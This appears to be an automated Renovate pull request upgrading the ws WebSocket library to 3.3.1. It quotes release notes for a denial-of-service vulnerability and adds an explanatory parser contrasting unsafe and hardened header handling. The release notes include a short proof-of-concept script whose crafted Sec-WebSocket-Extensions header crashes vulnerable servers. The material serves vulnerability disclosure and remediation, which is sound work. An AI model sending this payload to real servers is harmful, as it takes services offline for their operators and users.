Affected versions of ws (0.2.6 through 3.3.0, excluding 1.1.5) are vulnerable to a denial of service: a specially crafted value of the Sec-WebSocket-Extensions header that uses Object.prototype property names as extension or parameter names could be used to make a ws server crash.
Release Notes
websockets/ws
### [`v3.3.1`](https://togithub.com/websockets/ws/releases/3.3.1)
[Compare Source](https://togithub.com/websockets/ws/compare/3.3.0...3.3.1)
### Bug fixes
- Fixed a DoS vulnerability ([`c4fe466`](https://togithub.com/websockets/ws/commit/c4fe466)).
A specially crafted value of the `Sec-WebSocket-Extensions` header that
used `Object.prototype` property names as extension or parameter names
could be used to make a ws server crash.
```js
const WebSocket = require('ws');
const net = require('net');

// Start a server, then connect to it over a raw TCP socket so the
// upgrade request headers can be written by hand.
const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor'; // or ',;constructor'
  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');
  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```
The vulnerability has been privately reported by Nick Starke and
Ryan Knell of Sonatype Security Research and promptly fixed. Please
update now!
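The root cause described above is a lookup table built from a plain object, so a header token such as `constructor` collides with `Object.prototype`. The following is an added illustration, not code from ws or from the `c4fe466` fix: a simplified `Sec-WebSocket-Extensions` parser (RFC 6455 section 9.1 grammar without quoted-string values; `tokenize`, `parse`, `parseUnsafe` and `parseSafe` are names chosen here) run once with plain objects and once with prototype-less objects, so the crashing input and the hardened behaviour can be compared directly.

```javascript
// Added example, not code from ws: a minimal Sec-WebSocket-Extensions
// parser whose two entry points differ only in how lookup tables are
// created. Quoted-string parameter values are deliberately not handled.

// "permessage-deflate; client_max_window_bits=15, foo" becomes
// [['permessage-deflate', [['client_max_window_bits', '15']]], ['foo', []]].
function tokenize(header) {
  return header.split(',').map((ext) => {
    const [name, ...rawParams] = ext.split(';').map((s) => s.trim());
    const params = rawParams.filter(Boolean).map((p) => {
      const [key, value = true] = p.split('=').map((s) => s.trim());
      return [key, value];
    });
    return [name, params];
  });
}

// Builds { extName: [ { paramName: [values] }, ... ] }, calling makeTable()
// for every lookup table it needs.
function parse(header, makeTable) {
  const offers = makeTable();
  for (const [name, params] of tokenize(header)) {
    if (!offers[name]) offers[name] = [];
    const table = makeTable();
    for (const [key, value] of params) {
      if (!table[key]) table[key] = [];
      table[key].push(value);
    }
    offers[name].push(table);
  }
  return offers;
}

// Vulnerable shape: a plain {} inherits Object.prototype, so a name such as
// "constructor" resolves to Object's constructor function; the "already
// seen" check passes and .push() on a function throws a TypeError. Thrown
// inside the upgrade handler with nothing catching it, that exception ends
// the Node.js process, which is the crash the release notes describe.
function parseUnsafe(header) {
  return parse(header, () => ({}));
}

// Hardened shape: Object.create(null) has no prototype chain, so every
// lookup is an own-property lookup and "constructor" is an ordinary key.
// Object.prototype.hasOwnProperty.call(obj, key) or a Map work equally well.
function parseSafe(header) {
  return parse(header, () => Object.create(null));
}
```

Both payloads from the release notes (`constructor` and `,;constructor`) throw in `parseUnsafe` and parse cleanly in `parseSafe`; a well-formed offer such as `permessage-deflate; client_max_window_bits=15` produces the same structure in both.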
### [`v3.3.0`](https://togithub.com/websockets/ws/releases/3.3.0)
[Compare Source](https://togithub.com/websockets/ws/compare/3.2.0...3.3.0)
### Features
- Added `ecdhCurve` option ([#1228](https://togithub.com/websockets/ws/issues/1228)).
### [`v3.2.0`](https://togithub.com/websockets/ws/releases/3.2.0)
[Compare Source](https://togithub.com/websockets/ws/compare/3.1.0...3.2.0)
### Features
- Added ability to specify the compression level ([#1199](https://togithub.com/websockets/ws/issues/1199)).
- Added ability to limit the number of concurrent calls to zlib ([#1204](https://togithub.com/websockets/ws/issues/1204)).
### [`v3.1.0`](https://togithub.com/websockets/ws/releases/3.1.0)
[Compare Source](https://togithub.com/websockets/ws/compare/3.0.0...3.1.0)
### Features
- Added ability to specify the handshake request timeout ([#1177](https://togithub.com/websockets/ws/issues/1177)).
### Bug fixes
- Fixed an issue where `CloseEvent#wasClean` was incorrectly set to `false` for
close codes in the 3000-4999 range ([#1146](https://togithub.com/websockets/ws/issues/1146)).
### [`v3.0.0`](https://togithub.com/websockets/ws/releases/3.0.0)
[Compare Source](https://togithub.com/websockets/ws/compare/2.3.1...3.0.0)
### Breaking changes
- Removed the `upgradeReq` property ([#1099](https://togithub.com/websockets/ws/issues/1099)).
- Removed unnecessary events ([#1100](https://togithub.com/websockets/ws/issues/1100)).
- Removed the `flags` argument from the `'message'`, `'ping'`, and `'pong'`
events ([#1101](https://togithub.com/websockets/ws/issues/1101)).
- The permessage-deflate extension is now disabled by default on the server
([#1107](https://togithub.com/websockets/ws/issues/1107)).
### [`v2.3.1`](https://togithub.com/websockets/ws/releases/2.3.1)
[Compare Source](https://togithub.com/websockets/ws/compare/2.3.0...2.3.1)
### Bug fixes
- Fixed an issue that prevented `WebSocket.prototype.close()` from working
properly when called from a listener of the `headers` event ([`732aaf0`](https://togithub.com/websockets/ws/commit/732aaf0)).
### [`v2.3.0`](https://togithub.com/websockets/ws/releases/2.3.0)
[Compare Source](https://togithub.com/websockets/ws/compare/2.2.3...2.3.0)
### Features
- All hooks have now access to the upgrade request ([#1070](https://togithub.com/websockets/ws/issues/1070)).
- The `WebSocket` client now emits a `headers` event ([#1082](https://togithub.com/websockets/ws/issues/1082)).
Renovate configuration
:date: Schedule: "" (UTC).
:vertical_traffic_light: Automerge: Disabled by config. Please merge this manually once you are satisfied.
:recycle: Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
:no_bell: Ignore: Close this PR and you won't be reminded about this update again.
This PR contains the following updates: ws 2.2.3 -> 3.3.1
GitHub Vulnerability Alerts
GHSA-5v72-xg48-5rpm / WS-2017-0421
This PR has been generated by WhiteSource Renovate.